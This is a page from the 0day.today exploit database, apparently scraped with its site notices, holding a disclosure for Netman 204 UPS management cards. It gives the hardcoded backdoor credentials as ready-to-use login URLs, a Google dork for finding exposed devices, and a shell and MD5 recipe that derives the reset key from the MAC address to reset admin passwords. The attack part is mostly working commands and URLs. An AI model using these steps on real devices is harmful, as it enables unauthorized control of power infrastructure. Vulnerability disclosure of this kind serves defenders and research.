0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Netman 204 - Backdoor Account / Password Reset Vulnerability
# Exploit Title: Netman 204 Backdoor and weak password recovery function # Google Dork: intitle:"Netman 204 login" # Date: 31st Jan 2017 # Exploit Author: Simon Gurney # Vendor Homepage: blog.synack.co.uk # Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip # Version: S14-1 and S15-2 # Tested on: Reillo UPS # CVE : N/A Netman 204 cards have a backdoor account eurek:eurek. This account can be logged with by simply browsing to the URL http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek or https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek Due to flaws in parameter validation, the URL can be shortened to: http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek or https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet. If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet: NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' ` KEY=`echo .$NETMANID | md5sum | cut -c2-10` To generate the key, do an MD5 hash of 204:[MAC ADDRESS] Such as, 204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab Then take characters 2-10, where position 1 is character 1 (not 0). Such as, 354a65581 Then browse to the url: http://[ip]/cgi-bin/recover2.cgi?password=354a65581 or https://[ip]/cgi-bin/recover2.cgi?password=354a65581 Passwords have now been reset. # 0day.today [2024-11-15] #